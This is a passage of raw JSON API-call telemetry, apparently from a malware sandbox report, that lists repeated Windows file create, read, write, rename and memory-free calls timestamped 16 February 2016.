17:41:44,827", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,837", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,837", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,847", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,847", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,857", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,857", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,857", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,867", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,867", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,877", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,877", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,887", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,887", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,887", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,897", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,897", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,907", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,907", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,917", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,917", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,927", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,927", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,937", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,937", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,937", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,947", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,947", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,957", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,957", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,967", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,967", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,967", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,977", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,977", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,987", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,987", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,997", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:44,997", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:44,997", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,007", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,007", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,017", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,027", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,037", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,037", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,047", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,057", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,067", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,077", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,077", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,087", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,097", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,107", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,117", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,117", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,127", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,137", "api": 